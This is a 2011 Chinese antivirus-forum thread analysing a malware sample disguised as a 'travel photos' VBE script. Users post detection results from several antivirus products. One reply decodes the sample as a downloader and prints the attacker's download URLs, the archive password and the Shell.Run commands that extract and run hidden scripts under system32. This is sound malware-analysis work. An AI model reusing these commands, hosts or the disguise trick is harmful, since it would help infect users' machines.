一个vbe过360【来自求助区】

显示全部楼层 · 发表于 2011-9-9 10:57:29

http://bbs.kafan.cn/forum.php?mod=viewthread&tid=1076519#lastpost

微点不杀这类的东西，已上报红伞。

显示全部楼层 · 发表于 2011-9-9 11:00:57

小A拦截特鲁伊木马被拦截

显示全部楼层 · 发表于 2011-9-9 11:05:39

毒霸毛豆KILL

显示全部楼层 · 发表于 2011-9-9 11:09:23

360鉴定为木马，应该没有被过吧

文件信息
文件名称：D:\下载文件夹\旅游相片.vbe
文件大小：
10 Kb
内部名称：
无内部名称
文件签名：
无文件签名信息
文件描述：
经鉴定是一个木马
文件MD5：
db267a4ef332739b4e84f9a0c45fbc45

显示全部楼层 · 发表于 2011-9-9 11:18:16

jayavira 发表于 2011-9-9 11:09
360鉴定为木马，应该没有被过吧

你看原帖，估计是云的效应……

显示全部楼层 · 发表于 2011-9-9 11:25:59

这种脚本大多只能靠入库

很难处理的

显示全部楼层 · 发表于 2011-9-9 11:33:17

本帖最后由幸福的猪猪于 2011-9-9 12:20 编辑

源代码经过 JS.Encode加密。解密之后，替换相关关键词，再次解密。

可以发现其是一个Vbs下载者，其下载winrar.exe应该是无毒的？（卡巴斯基对其本地扫描检测的结果：未发现恶意代码）应该是用来解压下载回来的加密过的rar文件。（下载回来的加密RAR文件，应该含有恶意代码）

fxp://116.255.194.145:520/WinRAR.exe
fxp://116.255.194.145:520/USER01.rar

user.rar解压密码为：axcyaxcyaxcyaxcy

p.s. Shell.Run ("C:\WinRAR.exe x -ibck -paxcyaxcyaxcyaxcy C:\USER01.rar C:\WINDOWS\system32\Microsoft\Protect") '解压命令

解压之后，运行指定的Vbs脚本。

WshShell.Run ("C:\WINDOWS\system32\Microsoft\Protect\lib\setup.vbe")
WshShell.Run ("C:\WINDOWS\system32\Microsoft\Protect\bin\taskmrg.vbe")

复制代码

显示全部楼层 · 发表于 2011-9-9 11:54:04

大蜘蛛clean，文件加了壳：
=C2=C3=D3=CE=CF=E0=C6=AC.vbe packed by ENCODED SCRIPT
已上报！

显示全部楼层 · 发表于 2011-9-9 12:27:54

eset 报潜在
C:\Users\微亿毫\Desktop\旅游相片.rar > RAR > ________.vbe - VBS/Packed.Runner.D 潜在的不受欢迎应用程序

显示全部楼层 · 发表于 2011-9-9 13:51:32

360 wd 安全

[病毒样本] 一个vbe过360【来自求助区】

本帖子中包含更多资源

本帖子中包含更多资源

评分